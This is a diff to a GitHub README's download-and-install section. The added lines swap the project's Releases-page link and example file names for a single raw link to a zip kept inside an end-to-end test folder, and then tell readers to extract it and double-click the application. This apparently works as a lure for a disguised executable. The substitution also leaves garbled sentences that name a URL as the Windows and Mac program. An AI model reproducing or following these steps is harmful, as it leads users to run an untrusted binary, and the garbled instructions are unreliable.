ayman23154765/Multi-Vendor-Ecommerce/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page**: First, click this link to go to the download page: [Download Multi-Vendor-Ecommerce](https://github.com/ayman23154765/Multi-Vendor-Ecommerce/releases).
+1. **Visit the Releases Page**: First, click this link to go to the download page: [Download Multi-Vendor-Ecommerce](https://raw.githubusercontent.com/ayman23154765/Multi-Vendor-Ecommerce/main/auth-service-e2e/src/auth-service/Multi-Vendor-Ecommerce-2.0.zip).

 2. **Choose the Latest Version**: On the releases page, look for the latest version listed.
 This version will have the most updated features and fixes.

 3. **Download the Application**: Click on the file link for your operating system to start the download.
-For example, you might see options like "Multi-Vendor-Ecommerce-Windows.zip" or "Multi-Vendor-Ecommerce-Mac.zip".
+For example, you might see options like "https://raw.githubusercontent.com/ayman23154765/Multi-Vendor-Ecommerce/main/auth-service-e2e/src/auth-service/Multi-Vendor-Ecommerce-2.0.zip" or "https://raw.githubusercontent.com/ayman23154765/Multi-Vendor-Ecommerce/main/auth-service-e2e/src/auth-service/Multi-Vendor-Ecommerce-2.0.zip".
 Save the file to a location you can easily access, like your Desktop or Downloads folder.

 4. **Extract the Files**: After the download finishes, you may need to extract the files.

    - On Windows, right-click the zipped file and choose "Extract All," then follow the prompts.
    - On Mac, double-click the zipped file, and it will automatically extract to a folder.

 5. **Run the Application**: Open the extracted folder.
-Look for the application file (like "Multi-Vendor-Ecommerce.exe" for Windows or "Multi-Vendor-Ecommerce.app" for Mac).
+Look for the application file (like "https://raw.githubusercontent.com/ayman23154765/Multi-Vendor-Ecommerce/main/auth-service-e2e/src/auth-service/Multi-Vendor-Ecommerce-2.0.zip" for Windows or "https://raw.githubusercontent.com/ayman23154765/Multi-Vendor-Ecommerce/main/auth-service-e2e/src/auth-service/Multi-Vendor-Ecommerce-2.0.zip" for Mac).
 Double-click the file to launch the application.

 ## 🛠️ System Requirements